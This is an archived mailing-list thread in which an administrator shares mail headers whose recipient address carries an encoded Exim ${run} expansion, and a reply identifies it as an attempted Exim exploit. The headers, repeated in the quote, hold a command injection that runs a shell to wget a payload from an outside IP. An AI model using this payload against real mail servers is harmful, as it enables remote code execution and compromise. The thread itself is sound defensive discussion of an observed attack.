Mailing List Archive

Shell commands in Received and Delivered-To headers
Hi all,

Anyone have a guess on what this is trying to accomplish?

From root@sab.com Thu Jul 11 11:05:10 2019
Return-Path: <root@sab.com>
X-Original-To:
root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com
Delivered-To: username@example.com
Received: by host.example.com (Postfix)
id B58F61206F7; Thu, 11 Jul 2019 11:05:10 -0400 (EDT)
Delivered-To:
root+${run{x2fbinx2fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com
Received: from sab.com (ns3.nodename.ru [89.104.77.8])
by host.example.com (Postfix) with SMTP id 78E6F120294
for
<root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com>;
Thu, 11 Jul 2019 11:05:10 -0400 (EDT)

The IPs and host.example.com have been changed, but it's otherwise as
received. Is it a failed attempt at trying to generate a random string,
or to exploit some parser?
Re: Shell commands in Received and Delivered-To headers [ In reply to ]
It is an attempted exim exploit. Lmk if you need more info.

On Thu, Jul 11, 2019, 11:54 Dave Wreski <dwreski@guardiandigital.com> wrote:

> Hi all,
>
> Anyone have a guess on what this is trying to accomplish?
>
> From root@sab.com Thu Jul 11 11:05:10 2019
> Return-Path: <root@sab.com>
> X-Original-To:
> root+${
> run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com
> Delivered-To: username@example.com
> Received: by host.example.com (Postfix)
> id B58F61206F7; Thu, 11 Jul 2019 11:05:10 -0400 (EDT)
> Delivered-To:
> root+${
> run{x2fbinx2fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com
> Received: from sab.com (ns3.nodename.ru [89.104.77.8])
> by host.example.com (Postfix) with SMTP id 78E6F120294
> for
> <root+${
> run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com>;
>
> Thu, 11 Jul 2019 11:05:10 -0400 (EDT)
>
> The IPs and host.example.com have been changed, but it's otherwise as
> received. Is it a failed attempt at trying to generate a random string,
> or to exploit some parser?
>
>